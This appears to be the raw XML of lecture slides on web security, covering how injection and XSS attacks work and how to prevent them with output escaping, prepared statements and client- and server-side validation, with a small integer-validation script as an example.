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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="272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3" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="282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41"/>
    <p:restoredTop sz="94580"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="128" d="100"/>
          <a:sy n="128" d="100"/>
        </p:scale>
        <p:origin x="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1D85D-A530-EB49-8471-99AB4990F2CE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/15/18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21A8C-8478-B54E-A0EF-B11D86A3E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1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1B22A4E-97BB-3749-948C-A6B139C3E6CD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22A4E-97BB-3749-948C-A6B139C3E6CD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88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4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Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="C:\Users\cscaffid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YGF1PKAC\MP900433153[1]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665" y="2121218"/>
            <a:ext cx="7105172" cy="4736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7866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from real life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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture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" r="2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1251129" y="2174240"/>
            <a:ext cx="5080277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04080" y="6563360"/>
            <a:ext cx="6995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latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>www.securityweek.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>nbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>-cleans-site-after-citadel-compromise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60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what happens when you don't protect your users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499783"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Evil person puts SCRIPT or IFRAME tags into data used by your site (e.g., tweet database)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Your site sends the data in HTML/JS to some other unsuspecting user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The user's browser executes the SCRIPT or IFRAME tags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The SCRIPT or IFRAME tags make the browser execute JS from some evil site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The evil site's JS hacks the user's computer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The user's computer is totally compromised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71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HTML/JS injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(including XSS attacks)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494528"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>The fix is very simple:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not write any special html characters to the browser unless you know for absolutely certain that they are safe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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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2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Preventing SQL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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>The fix is very simple:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use any data in your SQL without escaping and/or validating it first.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/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dirty="0"/>
              <a:t>Use prepared statements whenever practical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dirty="0"/>
              <a:t>Validate inputs that you feel the need to concatenate with your SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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89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Strategy for fighting injection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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>This always works for all injection attacks of any sort whatsoever (e.g., SQL, HTML, JS):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clean all data before you use it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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Example: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dirty="0"/>
              <a:t>Prepared statements escape values in SQL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dirty="0"/>
              <a:t>Clean with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> before using in HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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13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option for preventing injection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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you might want to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clean data just after arrival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Example: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dirty="0"/>
              <a:t>Clean all data after reading it from database, from another server, from users, from files, from anywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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17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data just after arrival…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not always easy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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>When data arrives, you don't always know how it will eventually be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>So you don't know exactly how it needs to be cleaned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Are you trying to remove apostrophes ' because it's going to be used in SQL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Or are you trying to remove open brackets &lt; because it's going to be used in HTML/JS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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55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Common scenario: Posting data from the client to the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>(form submission)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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Validation on the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Help the user to find and fix mistakes fast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Validation on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Protect your database when you save the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a: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61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Ultra-simple client-side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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>frm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>frm.myint.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> = /^\-?[0-9]+$/.test(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>) alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>myint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> should be an int.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>="return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>(this)"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Enter an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>: &lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>myint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;/form&gt;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529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Simple validation with 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418" y="1933210"/>
            <a:ext cx="9613861" cy="4805257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;html&gt;&lt;head&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>="jquery-1.8.2.min.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>frm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>frm.myint.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> = /^\-?[0-9]+$/.test(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  $("#err").text(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> ? "" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>myint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> should be an int.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>rv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>="return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>(this)"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Enter an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>: &lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>myint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>"&gt;&lt;span id="err"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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98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Injection attacks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Injection: Inserting something into your code that does not belong there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Major threat to confidentiality, integrity, and availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Probably the most common mistake in web apps is leaving the door open to injection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jquery.validate.js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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316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1200" dirty="0"/>
              <a:t>Currently available from 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sz="1200" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>jqueryjs.googlecode.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>svn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>-history/r6243/trunk/plugins/validate/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>jquery.validate.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Supported validation classes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sz="1200" dirty="0"/>
              <a:t>required: This field is required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sz="1200" dirty="0"/>
              <a:t>remote: Please fix this field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sz="1200" dirty="0"/>
              <a:t>email: Please enter a valid email address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sz="1200" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: Please enter a valid URL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sz="1200" dirty="0"/>
              <a:t>date: Please enter a valid date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sz="1200" dirty="0"/>
              <a:t>number: Please enter a valid number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sz="1200" dirty="0"/>
              <a:t>digits: Please enter only digits,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sz="1200" dirty="0" err="1"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: Please enter a valid credit card number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sz="1200" dirty="0" err="1"/>
              <a:t>equalTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: Please enter the same value again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sz="1200" dirty="0"/>
              <a:t>accept: Please enter a value with a valid extension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sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: Max # characters allowed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sz="1200" dirty="0" err="1"/>
              <a:t>minlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: Min # characters allowed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sz="1200" dirty="0"/>
              <a:t>max: Max number value allowed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sz="1200" dirty="0"/>
              <a:t>min: Min number value allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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59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Validation on the server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18" y="2652183"/>
            <a:ext cx="9613861" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" dirty="0" smtClean="0"/>
              <a:t>We can use packages like express-validator and use it to validate inputs on the server end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bottom line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>clean data before use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Don't assume data have ever been cleaned before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Clean data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Before you use data for SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Before you use data to generate HTML/JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Before you use data to call other servers</a:t>
            </a:r>
          </a:p>
